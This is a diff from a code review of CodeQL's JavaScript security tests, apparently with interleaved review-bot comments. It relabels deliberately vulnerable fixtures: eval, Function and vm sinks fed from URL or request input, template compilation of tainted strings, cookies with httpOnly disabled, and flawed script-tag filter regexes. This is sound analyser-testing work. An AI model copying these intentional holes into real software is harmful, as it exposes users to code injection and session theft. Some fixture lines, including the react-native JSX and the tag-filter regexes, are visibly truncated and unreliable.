.controller('MyController', function($compile) { var compile = $compile; - compile(location.search); // BAD + compile(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($parse) { - $parse(location.search); // BAD + $parse(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($interpolate) { - $interpolate(location.search); // BAD + $interpolate(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($filter) { - $filter('orderBy')([], location.search); // BAD + $filter('orderBy')([], location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($filter) { - $filter('orderBy')([], 'hello'); // OK + $filter('orderBy')([], 'hello'); }) .controller('MyController', function($filter) { - $filter('random')([], location.search); // OK + $filter('random')([], location.search); }) .controller('MyController', function($someService) { - $someService('orderBy')([], location.search); // OK + $someService('orderBy')([], location.search); }) .controller('MyController', function($someService) { - $someService(location.search); // OK + $someService(location.search); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js index f330b1513546..a49288de66ee 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js 
@@ -5,18 +5,18 @@ function safeProp(key) { function test1() { const statements = []; statements.push(`${name}${safeProp(key)}=${stringify(thing[key])}`); - return `(function(){${statements.join(';')}})` // NOT OK + return `(function(){${statements.join(';')}})` // $ Alert[js/bad-code-sanitization] } import htmlescape from 'htmlescape' function test2(props) { const pathname = props.data.pathname; - return `function(){return new Error('${htmlescape(pathname)}')}`; // NOT OK + return `function(){return new Error('${htmlescape(pathname)}')}`; // $ Alert[js/bad-code-sanitization] } function test3(input) { - return `(function(){${JSON.stringify(input)}))` // NOT OK + return `(function(){${JSON.stringify(input)}))` // $ Alert[js/bad-code-sanitization] } function evenSaferProp(key) { @@ -24,24 +24,24 @@ function evenSaferProp(key) { } function test4(input) { - return `(function(){${evenSaferProp(input)}))` // OK + return `(function(){${evenSaferProp(input)}))` } function test4(input) { - var foo = `(function(){${JSON.stringify(input)}))` // NOT OK - we can type-track to a code-injection sink, the source is not remote flow. + var foo = `(function(){${JSON.stringify(input)}))` // $ Alert[js/bad-code-sanitization] - we can type-track to a code-injection sink, the source is not remote flow. setTimeout(foo); } function test5(input) { - console.log('methodName() => ' + JSON.stringify(input)); // OK + console.log('methodName() => ' + JSON.stringify(input)); } function test6(input) { - return `(() => {${JSON.stringify(input)})` // NOT OK + return `(() => {${JSON.stringify(input)})` // $ Alert[js/bad-code-sanitization] } function test7(input) { - return `() => {${JSON.stringify(input)}` // NOT OK + return `() => {${JSON.stringify(input)}` // $ Alert[js/bad-code-sanitization] } var express = require('express'); 
@@ -49,7 +49,7 @@ var express = require('express'); var app = express(); app.get('/some/path', function(req, res) { - var foo = `(function(){${JSON.stringify(req.param("wobble"))}))` // NOT - the source is remote-flow, but we know of no sink. + var foo = `(function(){${JSON.stringify(req.param("wobble"))}))` // $ Alert[js/bad-code-sanitization] - the source is remote-flow, but we know of no sink. setTimeout(`(function(){${JSON.stringify(req.param("wobble"))}))`); // OK - the source is remote-flow, and the sink is code-injection. @@ -61,7 +61,7 @@ app.get('/some/path', function(req, res) { // Bad documentation example: function createObjectWrite() { const assignment = `obj[${JSON.stringify(key)}]=42`; - return `(function(){${assignment}})` // NOT OK + return `(function(){${assignment}})` // $ Alert[js/bad-code-sanitization] } // Good documentation example: @@ -87,6 +87,6 @@ function good() { function createObjectWrite() { const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`; - return `(function(){${assignment}})` // OK + return `(function(){${assignment}})` } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js index 3a5abba84c03..58e67741a8c5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js 
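Review bot: The unchanged `setTimeout(...)` line in the `app.get('/some/path', ...)` hunk keeps `// OK - the source is remote-flow, and the sink is code-injection.`, which no longer says which query it is OK for now that the line above it is tagged `Alert[js/bad-code-sanitization]`. Read literally, remote input reaching a code-injection sink sounds like a finding, so the comment should state why nothing is expected, for example `// OK for js/bad-code-sanitization - remote flow into a code-injection sink is left to js/code-injection`. Whether js/code-injection itself should report the line cannot be decided from the hunk; express.js in this patch leaves a `JSON.stringify`-wrapped value unannotated, which suggests it is treated as sanitized there. The handler body continues outside the hunk.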
@@ -3,30 +3,23 @@ var express = require('express'); var app = express(); app.get('/some/path', function(req, res) { - // NOT OK - var f = new Function("return wibbles[" + req.param("wobble") + "];"); - // NOT OK - require("vm").runInThisContext("return wibbles[" + req.param("wobble") + "];"); + var f = new Function("return wibbles[" + req.param("wobble") + "];"); // $ Alert + require("vm").runInThisContext("return wibbles[" + req.param("wobble") + "];"); // $ Alert var runC = require("vm").runInNewContext; - // NOT OK - runC("return wibbles[" + req.param("wobble") + "];"); + runC("return wibbles[" + req.param("wobble") + "];"); // $ Alert var vm = require("vm"); - // NOT OK - vm.compileFunction(req.param("code_compileFunction")); - // NOT OK - var script = new vm.Script(req.param("code_Script")); - // NOT OK - var mdl = new vm.SourceTextModule(req.param("code_SourceTextModule")); - // NOT OK - vm.runInContext(req.param("code_runInContext"), vm.createContext()); + vm.compileFunction(req.param("code_compileFunction")); // $ Alert + var script = new vm.Script(req.param("code_Script")); // $ Alert + var mdl = new vm.SourceTextModule(req.param("code_SourceTextModule")); // $ Alert + vm.runInContext(req.param("code_runInContext"), vm.createContext()); // $ Alert }); const cp = require('child_process'); app.get('/other/path', function(req, res) { const taint = req.param("wobble"); - cp.execFileSync('node', ['-e', taint]); // NOT OK + cp.execFileSync('node', ['-e', taint]); // $ Alert[js/code-injection] - cp.execFileSync('node', ['-e', `console.log(${JSON.stringify(taint)})`]); // OK + cp.execFileSync('node', ['-e', `console.log(${JSON.stringify(taint)})`]); }); const pty = require('node-pty'); 
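Review bot: The seven annotations in the first handler (`new Function`, `runInThisContext`, `runC`, `vm.compileFunction`, `vm.Script`, `vm.SourceTextModule`, `vm.runInContext`) use a bare `// $ Alert`, while `cp.execFileSync('node', ['-e', taint])` a few lines below is tagged `// $ Alert[js/code-injection]`. Other files in this directory expect `js/bad-code-sanitization` and `js/unsafe-code-construction`, so an untagged marker does not pin which query must fire on these sinks. Each of them takes `req.param(...)` directly, so `// $ Alert[js/code-injection]` looks like the intended tag. The same bare `// $ Alert` appears in lib/index.js (`Template.prototype.compile` and both `doesTaint` methods) and in the top-level statements of tst.js. For lib/index.js the tag is presumably `js/unsafe-code-construction`, as used on its exported functions, but that should be confirmed against the expected output.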
@@ -40,13 +33,13 @@ app.get('/terminal', function(req, res) { env: process.env }); - shell.write(taint); // NOT OK + shell.write(taint); // $ Alert[js/code-injection] }); require("express-ws")(app); app.ws("/socket-thing/", function (ws, req) { ws.on("message", function (msg) { - eval(msg); // NOT OK + eval(msg); // $ Alert[js/code-injection] }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js index 9df334c56dc1..dbb715dfd7a4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js @@ -1,17 +1,17 @@ export function unsafeDeserialize(data) { - return eval("(" + data + ")"); // NOT OK + return eval("(" + data + ")"); // $ Alert[js/unsafe-code-construction] } export function unsafeGetter(obj, name) { - return eval("obj." + name); // NOT OK + return eval("obj." + name); // $ Alert[js/unsafe-code-construction] } export function safeAssignment(obj, value) { - eval("obj.foo = " + JSON.stringify(value)); // OK + eval("obj.foo = " + JSON.stringify(value)); } global.unsafeDeserialize = function (data) { - return eval("(" + data + ")"); // NOT OK + return eval("(" + data + ")"); // $ Alert[js/unsafe-code-construction] } const matter = require("gray-matter"); @@ -25,7 +25,7 @@ export function greySink(data) { const res = matter(str); console.log(res); - matter(str, { // OK + matter(str, { engines: { js: function (data) { console.log("NOPE"); @@ -48,7 +48,7 @@ export function Template(text, opts) { Template.prototype = { compile: function () { var opts = this.opts; - eval(" var " + opts.varName + " = something();"); // NOT OK + eval(" var " + opts.varName + " = something();"); // $ Alert }, // The below are justs tests that ensure the global-access-path computations terminate. pathsTerminate1: function (node, prev) { 
@@ -100,10 +100,10 @@ export class AccessPathClass { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options2.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options3.taintedOption + " = something();"); // NOT OK - eval(" var " + this.taint + " = something();"); // NOT OK + eval(" var " + this.options1.taintedOption + " = something();"); // $ Alert + eval(" var " + this.options2.taintedOption + " = something();"); // $ Alert + eval(" var " + this.options3.taintedOption + " = something();"); // $ Alert + eval(" var " + this.taint + " = something();"); // $ Alert } } @@ -132,10 +132,10 @@ export class AccessPathClassBB { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options2.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options3.taintedOption + " = something();"); // NOT OK - eval(" var " + this.taint + " = something();"); // NOT OK + eval(" var " + this.options1.taintedOption + " = something();"); // $ Alert + eval(" var " + this.options2.taintedOption + " = something();"); // $ Alert + eval(" var " + this.options3.taintedOption + " = something();"); // $ Alert + eval(" var " + this.taint + " = something();"); // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js index 64eeea78f2f1..18885dd25577 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js 
@@ -6,7 +6,7 @@ var app = express(); app.get('/some/path', function (req, res) { let filename = req.query.filename; var m = new Module(filename, module.parent); - m._compile(req.query.code, filename); // NOT OK + m._compile(req.query.code, filename); // $ Alert[js/code-injection] var m2 = new module.constructor; - m2._compile(req.query.code, filename); // NOT OK + m2._compile(req.query.code, filename); // $ Alert[js/code-injection] }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js index 0a9edc1ebe9c..9c11b511aa27 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js @@ -5,7 +5,7 @@ var app = express(); app.get('/some/path', function(req, res) { let tainted = req.param("code"); - ; // NOT OK + ; // $ Alert[js/code-injection] let wv = ; - wv.injectJavaScript(tainted); // NOT OK + wv.injectJavaScript(tainted); // $ Alert[js/code-injection] }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js index 51554663e4ee..d85b45e076f7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js 
@@ -17,18 +17,18 @@ var app = express(); app.get('/some/path', function (req, res) { let tainted = req.query.foo; - pug.compile(tainted); // NOT OK - pug.render(tainted); // NOT OK - jade.compile(tainted); // NOT OK - jade.render(tainted); // NOT OK - dot.template(tainted); // NOT OK - ejs.render(tainted); // NOT OK - nunjucks.renderString(tainted); // NOT OK - lodash.template(tainted); // NOT OK - dot.compile(tainted); // NOT OK - handlebars.compile(tainted); // NOT OK - mustache.render(tainted); // NOT OK - Hogan.compile(tainted); // NOT OK - Eta.render(tainted); // NOT OK - Sqrl.render(tainted); // NOT OK + pug.compile(tainted); // $ Alert[js/code-injection] + pug.render(tainted); // $ Alert[js/code-injection] + jade.compile(tainted); // $ Alert[js/code-injection] + jade.render(tainted); // $ Alert[js/code-injection] + dot.template(tainted); // $ Alert[js/code-injection] + ejs.render(tainted); // $ Alert[js/code-injection] + nunjucks.renderString(tainted); // $ Alert[js/code-injection] + lodash.template(tainted); // $ Alert[js/code-injection] + dot.compile(tainted); // $ Alert[js/code-injection] + handlebars.compile(tainted); // $ Alert[js/code-injection] + mustache.render(tainted); // $ Alert[js/code-injection] + Hogan.compile(tainted); // $ Alert[js/code-injection] + Eta.render(tainted); // $ Alert[js/code-injection] + Sqrl.render(tainted); // $ Alert[js/code-injection] }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js index 5b51da5daf26..0e35c7529112 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js 
@@ -1,38 +1,31 @@ -// NOT OK -eval(document.location.href.substring(document.location.href.indexOf("default=")+8)) +eval(document.location.href.substring(document.location.href.indexOf("default=")+8)) // $ Alert + +setTimeout(document.location.hash); // $ Alert -// NOT OK -setTimeout(document.location.hash); -// OK setTimeout(document.location.protocol); -// OK + $('. ' + document.location.hostname); -// NOT OK -Function(document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1")); +Function(document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1")); // $ Alert -// NOT OK -WebAssembly.compile(document.location.hash); +WebAssembly.compile(document.location.hash); // $ Alert -// NOT OK -WebAssembly.compileStreaming(document.location.hash); +WebAssembly.compileStreaming(document.location.hash); // $ Alert -// NOT OK -eval(atob(document.location.hash.substring(1))); +eval(atob(document.location.hash.substring(1))); // $ Alert -// NOT OK -$('').attr("onclick", location.search.substring(1)); +$('').attr("onclick", location.search.substring(1)); // $ Alert (function test() { var source = document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1"); - new Function(source); // NOT OK + new Function(source); // $ Alert[js/code-injection] - Function(source); // NOT OK + Function(source); // $ Alert[js/code-injection] - new Function("a", "b", source); // NOT OK + new Function("a", "b", source); // $ Alert[js/code-injection] - new Function(...["a", "b"], source); // NOT OK + new Function(...["a", "b"], source); // $ Alert[js/code-injection] })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html index 3f62fd326211..1d2014837d27 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html 
@@ -1,6 +1,6 @@ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js index 00fb98af9675..e9cb0a8b755c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js @@ -1,5 +1,5 @@ import * as webix from 'webix'; -webix.exec(document.location.hash); // NOT OK -webix.ui({ template: document.location.hash }); // NOT OK -webix.ui({ template: function () { return document.location.hash } }); // NOT OK \ No newline at end of file +webix.exec(document.location.hash); // $ Alert[js/code-injection] +webix.ui({ template: document.location.hash }); // $ Alert[js/code-injection] +webix.ui({ template: function () { return document.location.hash } }); // $ Alert[js/code-injection] \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js index 8ffd5a8addda..7c97f134bc90 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js @@ -10,5 +10,5 @@ window.addEventListener("message", (ev) => { let message = JSON.parse(ev.data); // Let the parent frame call the 'play' or 'pause' function - window[message.name](message.payload); // NOT OK + window[message.name](message.payload); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js index 2119fa97ed23..a5c32b914c70 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js @@ -2,21 +2,21 @@ let obj = {}; window.addEventListener('message', (ev) => { let message = JSON.parse(ev.data); - window[message.name](message.payload); // NOT OK - may invoke eval - new window[message.name](message.payload); // NOT OK - may invoke jQuery $ function or similar + window[message.name](message.payload); // $ Alert - may invoke eval + new window[message.name](message.payload); // $ Alert - may invoke jQuery $ function or similar window["HTMLElement" + message.name](message.payload); // OK - concatenation restricts choice of methods window[`HTMLElement${message.name}`](message.payload); // OK - concatenation restricts choice of methods function f() {} - f[message.name](message.payload)(); // NOT OK - may acccess Function constructor + f[message.name](message.payload)(); // $ Alert - may acccess Function constructor obj[message.name](message.payload); // OK - may crash, but no code execution involved - window[ev](ev); // NOT OK + window[ev](ev); // $ Alert window[configData() + ' ' + message.name](message.payload); // OK - concatenation restricts choice of methods window[configData() + message.name](message.payload); // OK - concatenation restricts choice of methods - window['' + message.name](message.payload); // NOT OK - coercion does not restrict choice of methods + window['' + message.name](message.payload); // $ Alert - coercion does not restrict choice of methods }); diff --git a/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js b/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js index b91f82c781f2..492990b49082 100644 --- a/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js +++ b/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js 
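Review bot: The rewritten annotation on `f[message.name](message.payload)();` still reads `may acccess Function constructor`; since the line is being touched anyway, make it `// $ Alert - may access Function constructor`. `window[ev](ev); // $ Alert` is also the only flagged line in this handler without a reason, where the others say which method can be reached. A short note such as `// $ Alert - the event object itself is used as the property name` would keep them uniform.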
@@ -5,19 +5,19 @@ const session = require('cookie-session') app.use(session({ name: 'session', keys: ['key1', 'key2'], - httpOnly: true, // GOOD + httpOnly: true, })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - httpOnly: false // BAD + httpOnly: false // $ Alert })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - secure: true // GOOD, httpOnly is true by default + secure: true // OK - httpOnly is true by default })) var sess = { @@ -26,7 +26,7 @@ var sess = { } sess.httpOnly = false; -app.use(session(sess)) // BAD +app.use(session(sess)) // $ Alert var sess2 = { name: 'session', @@ -35,7 +35,7 @@ var sess2 = { } sess2.httpOnly = false; -app.use(session(sess2)) // BAD +app.use(session(sess2)) // $ Alert var sess3 = { name: 'mycookie', @@ -44,21 +44,21 @@ var sess3 = { } sess3.httpOnly = false; -app.use(session(sess3)) // BAD, It is a session cookie, name doesn't matter +app.use(session(sess3)) // $ Alert - It is a session cookie, name doesn't matter var flag = false var flag2 = flag app.use(session({ name: 'session', keys: ['key1', 'key2'], - httpOnly: flag2 // BAD + httpOnly: flag2 // $ Alert })) app.get('/a', function (req, res, next) { res.cookie('authkey', 'value', { maxAge: 9000000000, - httpOnly: true, // GOOD + httpOnly: true, secure: false }); res.end('ok') @@ -68,7 +68,7 @@ app.get('/a', function (req, res, next) { res.cookie('authkey', 'value', { maxAge: 9000000000, - httpOnly: false, // BAD + httpOnly: false, // $ Alert secure: false }); res.end('ok') @@ -79,13 +79,13 @@ app.get('/a', function (req, res, next) { { maxAge: 9000000000 }); - res.end('ok') // BAD + res.end('ok') // $ Alert }) app.get('/a', function (req, res, next) { let options = { maxAge: 9000000000, - httpOnly: true, // GOOD + httpOnly: true, secure: false } res.cookie('authkey', 'value', options); 
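Review bot: In the `@@ -79,13 +79,13 @@` hunk the marker ends up on `res.end('ok') // $ Alert`, but the cookie without `httpOnly` is presumably set by the multi-line `res.cookie(...)` call whose options object `{ maxAge: 9000000000 }` closes just above it. The old `// BAD` was only a remark, whereas an inline expectation is matched against the line the alert is reported on, so this one probably will not line up with the result. Moving it to the line where the call starts, `res.cookie('authkey', 'value', // $ Alert`, and leaving `res.end('ok')` bare would match the other cases in this file, assuming the query reports at the call. The first lines of that call are outside the hunk.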
@@ -95,7 +95,7 @@ app.get('/a', function (req, res, next) { app.get('/a', function (req, res, next) { let options = { maxAge: 9000000000, - httpOnly: false, // BAD + httpOnly: false, // $ Alert secure: false } res.cookie('authkey', 'value', options); @@ -106,7 +106,7 @@ app.get('/a', function (req, res, next) { let options = { maxAge: 9000000000 } - res.cookie('authkey', 'value', options); // BAD + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) @@ -115,7 +115,7 @@ app.get('/a', function (req, res, next) { maxAge: 9000000000 } options.httpOnly = false; - res.cookie('authkey', 'value', options); // BAD + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) @@ -124,7 +124,7 @@ app.get('/a', function (req, res, next) { maxAge: 9000000000 } options.httpOnly = true; - res.cookie('authkey', 'value', options); // GOOD + res.cookie('authkey', 'value', options); res.end('ok') }) @@ -134,7 +134,7 @@ app.get('/a', function (req, res, next) { httpOnly: false, } options.httpOnly = false; - res.cookie('authkey', 'value', options); // BAD + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) @@ -145,7 +145,7 @@ app.get('/a', function (req, res, next) { } options.httpOnly = false; let authKey = "blabla" - res.cookie(authKey, 'value', options); // BAD, var name likely auth related + res.cookie(authKey, 'value', options); // $ Alert - var name likely auth related res.end('ok') }) @@ -156,7 +156,7 @@ app.get('/a', function (req, res, next) { } options.httpOnly = false; let o = { authKey: "blabla" } - res.cookie(o.authKey, 'value', options); // BAD, var name likely auth related + res.cookie(o.authKey, 'value', options); // $ Alert - var name likely auth related res.end('ok') }) 
@@ -167,7 +167,7 @@ app.get('/a', function (req, res, next) { } options.httpOnly = false; let blabla = "authKey" - res.cookie(blabla, 'value', options); // BAD, var name likely auth related + res.cookie(blabla, 'value', options); // $ Alert - var name likely auth related res.end('ok') }) @@ -177,7 +177,7 @@ app.get('/a', function (req, res, next) { httpOnly: true, } options.httpOnly = true; - res.cookie('authkey', 'value', options); // GOOD + res.cookie('authkey', 'value', options); res.end('ok') }) @@ -187,7 +187,7 @@ app.get('/a', function (req, res, next) { httpOnly: false, } options.httpOnly = true; - res.cookie('authkey', 'value', options); // GOOD + res.cookie('authkey', 'value', options); res.end('ok') }) @@ -196,7 +196,7 @@ app.get('/a', function (req, res, next) { maxAge: 9000000000, httpOnly: false, } - res.cookie('mycookie', 'value', options); // GOOD, name likely is not auth sensitive + res.cookie('mycookie', 'value', options); // OK - name likely is not auth sensitive res.end('ok') }) @@ -205,8 +205,7 @@ const http = require('http'); function test1() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // BAD - res.setHeader("Set-Cookie", "authKey=ninja"); + res.setHeader("Set-Cookie", "authKey=ninja"); // $ Alert res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -215,7 +214,7 @@ function test1() { function test2() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // GOOD + res.setHeader("Set-Cookie", "auth=ninja; HttpOnly"); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); 
@@ -225,8 +224,7 @@ function test2() { function test3() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // BAD - res.setHeader("Set-Cookie", ["authKey=ninja", "token=javascript"]); + res.setHeader("Set-Cookie", ["authKey=ninja", "token=javascript"]); // $ Alert res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -235,7 +233,7 @@ function test3() { function test4() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // GOOD + res.setHeader("Set-Cookie", ["auth=ninja; HttpOnly"]); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -245,7 +243,7 @@ function test4() { function test5() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // GOOD, case insensitive + // OK - case insensitive res.setHeader("Set-Cookie", ["auth=ninja; httponly"]); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -265,7 +263,7 @@ function test6() { function test7() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // Good, not auth related + // OK - not auth related res.setHeader("Set-Cookie", ["foo=ninja", "bar=javascript"]); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -276,7 +274,7 @@ function test8() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); let attr = "; httponly" - res.setHeader("Set-Cookie", `session=ninja ${attr}`); // Good, httponly string expression + res.setHeader("Set-Cookie", `session=ninja ${attr}`); // OK - httponly string expression res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); 
@@ -286,7 +284,7 @@ function test9() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); let attr = "; secure" - res.setHeader("Set-Cookie", `authKey=ninja ${attr}`); // Bad, not httponly string expression + res.setHeader("Set-Cookie", `authKey=ninja ${attr}`); // $ Alert - not httponly string expression res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -297,22 +295,22 @@ const session = require('express-session') app.use(session({ name: 'session', keys: ['key1', 'key2'], - cookie: { httpOnly: true }, // GOOD + cookie: { httpOnly: true }, })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - cookie: { httpOnly: false } // BAD + cookie: { httpOnly: false } // $ Alert })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - cookie: { secure: true } // GOOD, httpOnly is true by default + cookie: { secure: true } // OK - httpOnly is true by default })) -app.use(session({ // GOOD, httpOnly is true by default +app.use(session({ // OK - httpOnly is true by default name: 'session', keys: ['key1', 'key2'] })) @@ -320,14 +318,14 @@ app.use(session({ // GOOD, httpOnly is true by default app.use(session({ name: 'mycookie', keys: ['key1', 'key2'], - cookie: { httpOnly: false } // BAD, It is a session cookie, name doesn't matter + cookie: { httpOnly: false } // $ Alert - It is a session cookie, name doesn't matter })) const http = require('http'); function test10() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - res.setHeader("Set-Cookie", "sessionKey=" + makeSessionKey()); // BAD + res.setHeader("Set-Cookie", "sessionKey=" + makeSessionKey()); // $ Alert res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js index 5b294adae1b7..5fdc3b0c798e 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js @@ -1,25 +1,25 @@ var filters = [ - /.*?<\/script>/i, // NOT OK - doesn't match newlines or `` - /.*?<\/script>/is, // NOT OK - doesn't match `` - /.*?<\/script[^>]*>/is, // OK + /.*?<\/script>/i, // $ Alert - doesn't match newlines or `` + /.*?<\/script>/is, // $ Alert - doesn't match `` + /.*?<\/script[^>]*>/is, //is, // OK - we don't care regexps that only match comments - /)|([^\/\s>]+)[\S\s]*?>/, // NOT OK - doesn't match comments with the right capture groups - /<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))/, // NOT OK - capture groups - /(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)/gi, // NOT OK - capture groups - /<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) ?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))/g, // NOT OK - capture groups - /|<([^>]*?)>/g, // NOT OK - capture groups + /)|([^\/\s>]+)[\S\s]*?>/, // $ Alert - doesn't match comments with the right capture groups + /<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))/, // $ Alert - capture groups + /(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)/gi, // $ Alert - capture groups + /<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) ?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))/g, // $ Alert - capture groups + /|<([^>]*?)>/g, // $ Alert - capture groups ] doFilters(filters) 
